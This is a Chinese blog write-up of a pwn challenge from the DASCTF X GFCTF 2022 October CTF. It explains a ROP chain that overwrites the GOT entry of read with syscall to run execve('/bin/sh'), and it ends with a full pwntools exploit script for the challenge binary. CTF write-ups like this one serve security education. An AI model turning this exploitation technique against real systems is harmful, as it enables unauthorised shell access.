• DASCTF X GFCTF 2022十月挑战赛 - pwn

    DASCTF X GFCTF 2022十月挑战赛 - pwn

    简单题,自己做了一下发现要比官方wp思路麻烦一点,所以这里就用官方wp的思路
    在这里插入图片描述
    高版本编译出来的,所以没有csu这种万能的gadget,果断看一下汇编
    在这里插入图片描述
    看完之后仔细思考了一下发现这里完全可以使用上面这些gadgets。
    仔细看一下会发现可以控制rax,40116D 8B 44 24 0C mov eax, dword ptr [rsp+18h+buf]这里的地方,并且最后还可以控制ret
    还有地方:40115A 48 89 C6 mov rsi, rax这里又可以通过rax来控制rsi
    所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall
    在这里插入图片描述
    这里笔者直接在本地做的就直接打本地了,远程需要爆破一下最后的这个字节
    这样的话再调用read的时候就会调用syscall了
    这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了
    但是程序里没有可以直接控制rdi的,所以我们rop gadget看一下
    在这里插入图片描述
    发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh
    rdx在read上面时会被赋值为dword ptr [rsp+18h+buf],所以在写got表的时候将这里设置成指向0的地址即可

    from pwn import *
from time import sleep

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('node4.buuoj.cn', 29736)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

r.send(p32(0x100))

bss_addr = 0x404018

# mov     eax, dword ptr [rsp+18h+buf]; add     rsp, 18h; retn
mov_rax_rsp_add_rsp = 0x40116D

call_read = 0x40115A

mov_rdi_404018_jump_rax = 0x0000000000401099

read_got = elf.got['read']

ret = 0x401175

lea_rsi = 0x401141

p1 = b'a' * 0x10 + p64(mov_rax_rsp_add_rsp) + p64(0) + p32(0) + p32(bss_addr) + p64(0) + p64(call_read)
p1 += p64(0) + p32(0) + p32(read_got) + p64(0) + p64(call_read)
p1 += p64(0) + p32(0) + p32(bss_addr + 8) + p64(0) + p64(mov_rax_rsp_add_rsp)

p1 += p64(0) + p32(0) + p32(ret) + p64(0) + p64(mov_rdi_404018_jump_rax)
p1 += p64(mov_rax_rsp_add_rsp) + p64(0) + p32(0) + p32(0x3b) + p64(0) + p64(lea_rsi)
p1 += p64(0) + p32(0) + p32(0) + p64(0)

r.send(p1)

r.send('/bin/sh\x00')
r.send('\x60')

r.interactive()

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
  • 相关阅读:
    OpenHarmony教程指南—ArkUI中组件、通用、动画、全局方法的集合
    废了九牛二虎之力终于修改了MySQL8.0的root密码
    DBConvert Studio 3.0.6 -2022-08-13 Crack
    一文学懂Map和Set——详解
    实现客户端pineline的思路
    关于Flask_查询参数的获取的方法
    云智研发公司面试真题
    java中的原子操作类
    IP 基础
    使用lighttpd搭建轻量级web服务器详解
  • 原文地址:https://blog.csdn.net/zzq487782568/article/details/127561616